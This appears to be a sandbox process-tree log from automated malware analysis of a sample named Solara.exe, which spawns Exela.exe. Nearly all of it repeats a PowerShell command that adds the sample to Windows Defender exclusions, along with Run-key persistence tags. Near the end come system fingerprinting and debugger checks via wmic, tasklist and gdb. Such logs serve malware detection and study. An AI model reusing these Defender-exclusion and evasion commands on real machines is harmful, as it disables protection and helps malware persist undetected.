        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        72⤵
        Checks computer location settings
        
        PID:1332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        73⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        73⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        74⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        74⤵
        
        PID:2068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        75⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        75⤵
        Adds Run key to start application
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        76⤵
        
        PID:3368
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        76⤵
        
        PID:3520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        77⤵
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        77⤵
        
        PID:3976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        78⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        78⤵
        
        PID:2828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        79⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        79⤵
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        80⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        80⤵
        Adds Run key to start application
        
        PID:4608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        81⤵
        
        PID:2840
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        81⤵
        Adds Run key to start application
        
        PID:2616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        82⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        82⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        83⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        83⤵
        
        PID:412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        84⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        84⤵
        
        PID:2444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        85⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        85⤵
        Adds Run key to start application
        
        PID:4884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        86⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        86⤵
        
        PID:2504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        87⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        87⤵
        
        PID:756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        88⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        88⤵
        
        PID:3864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        89⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        89⤵
        Checks computer location settings
        
        PID:4348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        90⤵
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        90⤵
        Checks computer location settings
        
        PID:1920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        91⤵
        
        PID:928
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        91⤵
        
        PID:3012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        92⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        92⤵
        
        PID:5040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        93⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        93⤵
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        94⤵
        
        PID:544
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        94⤵
        
        PID:972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        95⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        95⤵
        Checks computer location settings
        
        PID:4120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        96⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        96⤵
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        97⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        97⤵
        
        PID:4368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        98⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        98⤵
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        99⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        99⤵
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        100⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        100⤵
        
        PID:1908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        101⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        101⤵
        
        PID:440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        102⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        102⤵
        
        PID:3396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        103⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        103⤵
        
        PID:5016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        104⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        104⤵
        
        PID:1748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        105⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        105⤵
        
        PID:3400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        106⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        106⤵
        
        PID:4292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        107⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        107⤵
        
        PID:4368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        108⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        108⤵
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        109⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        109⤵
        
        PID:1180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        110⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:520
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        110⤵
        Checks computer location settings
        
        PID:544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        111⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        111⤵
        Checks computer location settings
        
        PID:4408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        112⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        112⤵
        
        PID:4792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        113⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        113⤵
        Adds Run key to start application
        
        PID:4084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        114⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        114⤵
        
        PID:1172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        115⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        115⤵
        
        PID:3716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        116⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        116⤵
        
        PID:2132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        117⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        117⤵
        
        PID:2520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        118⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        118⤵
        Adds Run key to start application
        
        PID:3936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        119⤵
        
        PID:1704
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        119⤵
        Checks computer location settings
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        120⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        120⤵
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        121⤵
        
        PID:896
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        121⤵
        
        PID:3188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        122⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        122⤵
        
        PID:3300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        123⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        123⤵
        Checks computer location settings
        
        PID:4504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        124⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        124⤵
        Adds Run key to start application
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        125⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        125⤵
        
        PID:4984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        126⤵
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        126⤵
        
        PID:60
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        127⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        127⤵
        Adds Run key to start application
        
        PID:772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        128⤵
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        127⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        127⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        128⤵
        
        PID:2308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        129⤵
        
        PID:4744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        126⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        126⤵
        
        PID:3492
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        127⤵
        
        PID:1180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        128⤵
        
        PID:2372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        128⤵
        
        PID:2172
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        129⤵
        Detects videocard installed
        
        PID:1900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        128⤵
        
        PID:5100
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        129⤵
        
        PID:1008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        128⤵
        
        PID:4552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        128⤵
        
        PID:2764
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        129⤵
        Enumerates processes with tasklist
        
        PID:924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        128⤵
        
        PID:2416
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        129⤵
        
        PID:2840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        128⤵
        
        PID:2844
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        129⤵
        
        PID:1512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        128⤵
        
        PID:3892
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        129⤵
        Enumerates processes with tasklist
        
        PID:2904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        128⤵
        
        PID:2940
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        129⤵
        Enumerates processes with tasklist
        
        PID:1036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        128⤵
        
        PID:940
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        129⤵
        
        PID:3548
        
        C:\Windows\system32\chcp.com
        
        chcp
        130⤵
        
        PID:2828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        128⤵
        
        PID:5116
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        129⤵
        
        PID:3944
        
        C:\Windows\system32\chcp.com
        
        chcp
        130⤵
        
        PID:1488
        
        C:\Windows\system32\cmd.exe
        
